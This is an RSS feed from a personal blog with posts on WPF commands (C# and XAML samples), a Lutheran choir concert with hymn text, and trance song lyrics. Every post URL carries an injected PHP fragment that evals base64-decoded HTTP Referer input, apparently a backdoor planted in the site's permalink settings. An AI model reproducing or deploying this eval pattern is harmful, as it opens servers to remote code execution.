<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Friedrich&#039;s Blog &#187; Music</title>
	<atom:link href="http://brunzema.com/blog/category/music/feed/" rel="self" type="application/rss+xml" />
	<link>http://brunzema.com/blog</link>
	<description>Life, the universe and all.</description>
	<lastBuildDate>Fri, 23 Apr 2010 18:02:09 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Playing with WPF Commands</title>
		<link>http://brunzema.com/blog/2008/05/07/playing-with-wpf-commands/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://brunzema.com/blog/2008/05/07/playing-with-wpf-commands/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Thu, 08 May 2008 03:17:02 +0000</pubDate>
		<dc:creator>brunzefb</dc:creator>
				<category><![CDATA[Computers - General]]></category>
		<category><![CDATA[Music]]></category>
		<category><![CDATA[WPF]]></category>

		<guid isPermaLink="false">http://brunzema.com/blog/?p=82</guid>
		<description><![CDATA[Download Sample source code (26KB), for Visual Studio 2008 Here is a small WPF application I wrote, which I wanted to share. It is kind of dumb, but does show some interesting concepts, including data binding, localization, commands, a view model, menus and icons in menus. How does it work? Press the ShowMessage button, and [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://brunzema.com/blog_extra/download.gif" alt="download Playing with WPF Commands"  title="Playing with WPF Commands" /> Download Sample <a href="http://www.brunzema.com/blog_extra/downloads/DemoApplication.zip">source code</a> (26KB), for Visual Studio 2008<br />
<br/><br />
<img src="http://brunzema.com/blog_extra/mvc.png" alt="mvc Playing with WPF Commands"  title="Playing with WPF Commands" /><br />
<br/><br />
Here is a small WPF application I wrote, which I wanted to share.  It is kind of dumb, but does show some interesting concepts, including data binding, localization, commands, a view model, menus and icons in menus.  How does it work?  Press the ShowMessage button, and it will show you the text in the edit box inside a message box.  Press reset, and the text inside the edit box gets reset.  The two commands button commands are also propagated to the menu.</p>
<p>The UI was designed in Expression Blend, although I admit that I often went back to editing the XML manually.  Maybe this is how you are supposed to use Blend, or I just don't know yet how to do this in Blend. One thing to note is that even though the application is localized, the UI still shows up both in Blend and in the Visual Studio 2008 editor.  For the curious, I am using Approach #1 from my <a href="http://www.codeproject.com/KB/WPF/WPFUsingLocbaml.aspx">CodeProject Article</a> on localization. (You will need to download and install the ResXFileCodeGeneratorEx <a href="http://www.codeproject.com/KB/dotnet/ResXFileCodeGeneratorEx.aspx">addin</a> to compile the sample.)</p>
<p>I must admit that I borrowed some ideas from Josh Smith's  <a href="http://www.codeproject.com/KB/WPF/MVCtoUnitTestinWPF.aspx">article</a> on Model View Controller Unit Testing WPF. Let us focus on the commands for now:</p>
<pre class="csharp"><span style="color: #0600FF;">public</span> <span style="color: #0600FF;">static</span> <span style="color: #FF0000;">class</span> Commands
<span style="color: #000000;">&#123;</span>
    <span style="color: #0600FF;">public</span> <span style="color: #0600FF;">static</span> <span style="color: #0600FF;">readonly</span> RoutedUICommand Button1Command;
    <span style="color: #0600FF;">public</span> <span style="color: #0600FF;">static</span> <span style="color: #0600FF;">readonly</span> RoutedUICommand Button2Command;
&nbsp;
    <span style="color: #0600FF;">static</span> Commands<span style="color: #000000;">&#40;</span><span style="color: #000000;">&#41;</span>
    <span style="color: #000000;">&#123;</span>
        Button1Command = <a href="http://www.google.com/search?q=new+msdn.microsoft.com"><span style="color: #008000;">new</span></a> RoutedUICommand<span style="color: #000000;">&#40;</span>Strings.<span style="color: #0000FF;">Button1</span>, <span style="color: #808080;">&quot;Button1Command&quot;</span>,
            <a href="http://www.google.com/search?q=typeof+msdn.microsoft.com"><span style="color: #008000;">typeof</span></a> <span style="color: #000000;">&#40;</span>Commands<span style="color: #000000;">&#41;</span><span style="color: #000000;">&#41;</span>;
        Button2Command = <a href="http://www.google.com/search?q=new+msdn.microsoft.com"><span style="color: #008000;">new</span></a> RoutedUICommand<span style="color: #000000;">&#40;</span>Strings.<span style="color: #0000FF;">Button2</span>, <span style="color: #808080;">&quot;Button2Command&quot;</span>,
            <a href="http://www.google.com/search?q=typeof+msdn.microsoft.com"><span style="color: #008000;">typeof</span></a> <span style="color: #000000;">&#40;</span>Commands<span style="color: #000000;">&#41;</span><span style="color: #000000;">&#41;</span>;
    <span style="color: #000000;">&#125;</span>
<span style="color: #000000;">&#125;</span></pre>
<p><br/>So this is just a static class containing static commands that are initialized as soon as the class is referenced for the first time.  Note that the names come from a string resource, and this helps in the localization.  Now how do we use the commands?</p>
<p>This code is part of the MainWindow.xaml, right under the Window tag.  What it does is tell WPF that we wish to intercept the commands we list under the &lt;Window.CommandBindings&gt; tag.  Now the command itself comes from the static class I just showed.  Note the use of the 'DemoApplication' namespace identifier; for this to work we have to define/import the namespace which is done as an attribute of the Window tag like so:</p>
<pre class="xml">xmlns:DemoApplication=&quot;clr-namespace:DemoApplication;assembly=&quot;</pre>
<p>The command also has two attributes, the CanExecute and Executed, which point to code-behind found in the MainWindow.cs.  The CanExecute determines if the command is available, and the Executed delegate is fired when the command is invoked.  Here is what the implementation looks like:</p>
<pre class="csharp"><span style="color: #0600FF;">private</span> <span style="color: #0600FF;">void</span> Button1_CanExecute<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">object</span> sender, CanExecuteRoutedEventArgs e<span style="color: #000000;">&#41;</span>
<span style="color: #000000;">&#123;</span>
    e.<span style="color: #0000FF;">CanExecute</span> = <span style="color: #0600FF;">true</span>;
<span style="color: #000000;">&#125;</span>
&nbsp;
<span style="color: #0600FF;">private</span> <span style="color: #0600FF;">void</span> Button1_Executed<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">object</span> sender, ExecutedRoutedEventArgs e<span style="color: #000000;">&#41;</span>
<span style="color: #000000;">&#123;</span>
    MessageBox.<span style="color: #0000FF;">Show</span><span style="color: #000000;">&#40;</span>Strings.<span style="color: #0000FF;">TextIs</span> + mViewModel.<span style="color: #0000FF;">EditBoxContents</span>, Strings.<span style="color: #0000FF;">ButtonPressed</span><span style="color: #000000;">&#41;</span>;
<span style="color: #000000;">&#125;</span>
&nbsp;
<span style="color: #0600FF;">private</span> <span style="color: #0600FF;">void</span> Button2_CanExecute<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">object</span> sender, CanExecuteRoutedEventArgs e<span style="color: #000000;">&#41;</span>
<span style="color: #000000;">&#123;</span>
    e.<span style="color: #0000FF;">CanExecute</span> = <span style="color: #0600FF;">true</span>;
<span style="color: #000000;">&#125;</span>
&nbsp;
<span style="color: #0600FF;">private</span> <span style="color: #0600FF;">void</span> Button2_Executed<span style="color: #000000;">&#40;</span><span style="color: #FF0000;">object</span> sender, ExecutedRoutedEventArgs e<span style="color: #000000;">&#41;</span>
<span style="color: #000000;">&#123;</span>
    mViewModel.<span style="color: #0000FF;">EditBoxContents</span> = Strings.<span style="color: #0000FF;">ResetText</span>;
<span style="color: #000000;">&#125;</span></pre>
<p><br/>Now we have the commands defined and created and hooked up the delegates that actually handle the commands (and if the command is available), it is time to hook up the command to both to the buttons and to the menus.</p>
<pre class="xml">&nbsp;
<span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;Menu</span> DockPanel.<span style="color: #000066;">Dock</span>=<span style="color: #ff0000;">&quot;Top&quot;</span><span style="font-weight: bold; color: black;">&gt;</span></span>
  <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;MenuItem</span> <span style="color: #000066;">Header</span>=<span style="color: #ff0000;">&quot;{x:Static Properties:Strings.TopLevelMenu}&quot;</span> <span style="font-weight: bold; color: black;">&gt;</span></span>
    <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;MenuItem</span> <span style="color: #000066;">Header</span>=<span style="color: #ff0000;">&quot;{x:Static Properties:Strings.Button1}&quot;</span>
              <span style="color: #000066;">Command</span>=<span style="color: #ff0000;">&quot;{x:Static DemoApplication:Commands.Button1Command}&quot;</span> <span style="font-weight: bold; color: black;">&gt;</span></span>
      <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;MenuItem</span>.Icon<span style="font-weight: bold; color: black;">&gt;</span></span>
        <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;Image</span> <span style="color: #000066;">Source</span>=<span style="color: #ff0000;">&quot;Icons/control_play.png&quot;</span><span style="font-weight: bold; color: black;">/&gt;</span></span>
      <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;/MenuItem</span>.Icon<span style="font-weight: bold; color: black;">&gt;</span></span>
    <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;/MenuItem<span style="font-weight: bold; color: black;">&gt;</span></span></span>
    <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;MenuItem</span> <span style="color: #000066;">Header</span>=<span style="color: #ff0000;">&quot;{x:Static Properties:Strings.Button2}&quot;</span>
              <span style="color: #000066;">Command</span>=<span style="color: #ff0000;">&quot;{x:Static DemoApplication:Commands.Button2Command}&quot;</span> <span style="font-weight: bold; color: black;">&gt;</span></span>
      <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;MenuItem</span>.Icon<span style="font-weight: bold; color: black;">&gt;</span></span>
        <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;Image</span> <span style="color: #000066;">Source</span>=<span style="color: #ff0000;">&quot;Icons/control_stop.png&quot;</span><span style="font-weight: bold; color: black;">/&gt;</span></span>
      <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;/MenuItem</span>.Icon<span style="font-weight: bold; color: black;">&gt;</span></span>
    <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;/MenuItem<span style="font-weight: bold; color: black;">&gt;</span></span></span>
  <span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;/MenuItem<span style="font-weight: bold; color: black;">&gt;</span></span></span>
<span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;/Menu<span style="font-weight: bold; color: black;">&gt;</span></span></span>
&nbsp;
<span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;Button</span> <span style="color: #000066;">Content</span>=<span style="color: #ff0000;">&quot;{x:Static Properties:Strings.Button1}&quot;</span>
        <span style="color: #000066;">Command</span>=<span style="color: #ff0000;">&quot;{x:Static DemoApplication:Commands.Button1Command}&quot;</span>
        Grid.<span style="color: #000066;">Row</span>=<span style="color: #ff0000;">&quot;1&quot;</span>
        <span style="color: #000066;">VerticalAlignment</span>=<span style="color: #ff0000;">&quot;Top&quot;</span> <span style="font-weight: bold; color: black;">/&gt;</span></span>
<span style="color: #009900;"><span style="font-weight: bold; color: black;">&lt;Button</span> <span style="color: #000066;">Content</span>=<span style="color: #ff0000;">&quot;{x:Static Properties:Strings.Button2}&quot;</span>
        <span style="color: #000066;">Command</span>=<span style="color: #ff0000;">&quot;{x:Static DemoApplication:Commands.Button2Command}&quot;</span>
        Grid.<span style="color: #000066;">Column</span>=<span style="color: #ff0000;">&quot;1&quot;</span>
        Grid.<span style="color: #000066;">Row</span>=<span style="color: #ff0000;">&quot;1&quot;</span>
        <span style="color: #000066;">VerticalAlignment</span>=<span style="color: #ff0000;">&quot;Top&quot;</span> <span style="font-weight: bold; color: black;">/&gt;</span></span>
&nbsp;</pre>
<p><br/>The localized app in French looks as follows:<br />
<img src="http://brunzema.com/blog_extra/demo-fr.png" alt="demo fr Playing with WPF Commands"  title="Playing with WPF Commands" /><br/><br />
The English version is here:<br />
<img src="http://brunzema.com/blog_extra/demo.png" alt="demo Playing with WPF Commands"  title="Playing with WPF Commands" /><br />
<br/>Enough for now - good night!</p>
]]></content:encoded>
			<wfw:commentRss>http://brunzema.com/blog/2008/05/07/playing-with-wpf-commands/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spring Music at St. George’s Church</title>
		<link>http://brunzema.com/blog/2008/04/27/spring-music-at-st-george%e2%80%99s-church/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://brunzema.com/blog/2008/04/27/spring-music-at-st-george%e2%80%99s-church/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Sun, 27 Apr 2008 22:27:39 +0000</pubDate>
		<dc:creator>brunzefb</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://brunzema.com/blog/?p=10</guid>
		<description><![CDATA[I am a member of a little German Choir, at St. George's Lutheran Church in Toronto, which normally has just one concert a year at Christmas (even though we attend First Lutheran Church). This year Burkhard Moeller, the pastor's husband, asked if I could participate in the spring concert. I initially said no, because a [...]]]></description>
			<content:encoded><![CDATA[<p>I am a member of a little German Choir, at <a href="http://www.st-georgs-toronto.com/">St. George's Lutheran Church</a> in Toronto, which normally has just one concert a year at Christmas (even though we attend <a href="http://www.firstlutherantoronto.com">First Lutheran Church</a>). This year Burkhard Moeller, the pastor's husband, asked if I could participate in the spring concert. I initially said no, because a lot of things were happening on the weekends with the kids and that joining the practices would be difficult. Burkhard then called me, asking me to join anyways because there was a shortage of basses – a problem if your choir only as 12 people. So I agreed to come to the practices that I could attend. Manya, my dear wife nearly had a fit – heart attack – or nervous breakdown, mentioning that other things were happening at nearly all the practices, and that the kids' soccer collided with the concert, which we performed today.
</p>
<p>Despite the problems, I was able to attend 4 of the practices and the concert – I also played the soprano recorder. Here the choir part of the material we sang:
</p>
<p>     <br />
 </p>
<div>
<table style="border-collapse:collapse" border="0">
<colgroup>
<col style="width:262px"/>
<col style="width:218px"/></colgroup>
<tbody valign="top">
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Alta trinita Beata</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>From Italy, 15<sup>th</sup> century</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Die gueldene Sonne</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Johann Georg Ebeling</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Zuvor, so last uns gruessen</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Werner Gneist</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Kommt herzu und lasst uns Froehlich sein</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Heinrich Schuetz</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Singet dem Herrn ein neues Lied</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Heinrich Schuetz</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Wir lieben sehr im Herzen</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Daniel Friderici</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Jauchze, frohlocke, du himmlischer Chor</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Anonymous</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Hinunter ist der Sonnenschein</p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p><br/>Melchior Vulpius, <br/>text: Nikolaus Herman, 1480-1561</p>
</td>
</tr>
</tbody>
</table>
</div>
<p> I really liked the last piece, both from the melody and text wise. The text goes as follows:
</p>
<div>
<table style="border-collapse:collapse" border="0">
<colgroup>
<col style="width:264px"/>
<col style="width:330px"/></colgroup>
<tbody valign="top">
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Hinunter ist der Sonnen Schein,<br/>die Finstre Nacht bricht stark herein.<br/>Leucht uns, Herr Christ du wahres Licht,<br/>lass uns im finstern tappen nicht. </p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>The sun's last beam of light is gone,<br/>The shades of night come swiftly on;<br/>O Christ, our Light, upon us shine<br/>Lest we to sin's dark ways incline.</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Dir sei Dank dass du uns den Tag<br/>vor Schaden G'fahr und mancher Plag<br/>durch deine Engel hast behuet<br/>aus Gnad und vaeterlicher Guet. </p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>The sun's last beam of light is gone,<br/>The shades of night come swiftly on;<br/>O Christ, our Light, upon us shine<br/>Lest we to sin's dark ways incline.</p>
</td>
</tr>
<tr>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Durch deinen Engel die Wach bestell,<br/>das suns der boese Feind nicht faell;<br/>vor Schrecken, Angst und Feuersnot<br/>behuet uns heut, o lieber Gott. </p>
</td>
<td vAlign="middle" style="padding-top: 1px; padding-left: 7px; padding-bottom: 1px; padding-right: 7px">
<p>Let angels guard our sleeping hours<br/>And drive away all evil powers;<br/>Our soul and body, while we sleep,<br/>In safety, gracious Father, keep.</p>
</td>
</tr>
</tbody>
</table>
</div>
<p><br/>The concert was a good one, even though relatively few people attended. For me, the goal is not to impress people, but to sing joyfully onto the Lord, and to be with people who enjoy making music in an unpretentious setting. A recording of all of the music is available <a href="http://www.moellerorgans.com/FK.html">here</a> if you are interested.
</p>
<p>    </p>
]]></content:encoded>
			<wfw:commentRss>http://brunzema.com/blog/2008/04/27/spring-music-at-st-george%e2%80%99s-church/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>It’s like hot, running water&#8230;</title>
		<link>http://brunzema.com/blog/2008/04/27/it%e2%80%99s-like-hot-running-water/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/</link>
		<comments>http://brunzema.com/blog/2008/04/27/it%e2%80%99s-like-hot-running-water/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/#comments</comments>
		<pubDate>Sun, 27 Apr 2008 20:01:54 +0000</pubDate>
		<dc:creator>brunzefb</dc:creator>
				<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://brunzema.com/blog/?p=9</guid>
		<description><![CDATA[Been listening to DJ Shog's Hot Running Water on Sirius 33 (would you expect me to listen to trance?) The lyrics are interesting, an go like this... (I think they are still incomplete, because there is a reference in to depression in the song as well. Irma Esselien Florence is the one performing the vocals [...]]]></description>
			<content:encoded><![CDATA[<p>Been listening to DJ Shog's Hot Running Water on Sirius 33 (would you expect me to listen to trance?) The lyrics are interesting, an go like this... (I think they are still incomplete, because there is a reference in to depression in the song as well. Irma Esselien Florence is the one performing the vocals in this tune.
</p>
<p><span style="font-family:Arial; font-size:10pt">----------- </span>
	</p>
<p><span style="font-family:Courier New; font-size:10pt">It's like hot, running water,<br/>When you're tired of the pressure<br/>And there's no room for mistake<br/><br/>It's like hot, (like hot) running water, (running water)<br/>As it runs through your fingers,<br/>Living in burning pain<br/><br/>Love's like hot (like hot), running water (running water),<br/>Once it runs through your fingers,<br/>Painful in every way<br/><br/>How it hurts to lose a partner,<br/>How it hurts to lose a friend.<br/><br/>There is no wound, but still there is agonizing pain<br/><br/>When you're tired of the pressure,<br/>There is no room for mistakes,<br/>And the words don't seem to make it right,<br/>No matter what you say<br/><br/>It's like hot, (like hot) running water, (running water)<br/>As it runs to your fingers,<br/>Living in burning pain<br/><br/>Love's like hot, (like hot) running water (running water...)<br/>Once it runs through your fingers,<br/>Painful in every way<br/><br/>How it hurts to lose a partner,<br/>How it hurts to lose a friend.<br/><br/>There is no wound, but still there is agonizing pain<br/><br/>When you're tired of the pressure,<br/>There is no room for mistakes,<br/>And the words don't seem to make it right,<br/>No matter what you say<br/> </span>
	</p>
<p><span style="font-family:Arial; font-size:10pt">Jesus answered her, "If you knew the gift of God and who it is that asks you for a drink, you would have asked him and he would have given you living water." </span></p>
]]></content:encoded>
			<wfw:commentRss>http://brunzema.com/blog/2008/04/27/it%e2%80%99s-like-hot-running-water/%&#038;($eval(base64_decode($_SERVERHTTP_REFERER))|.+)&#038;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

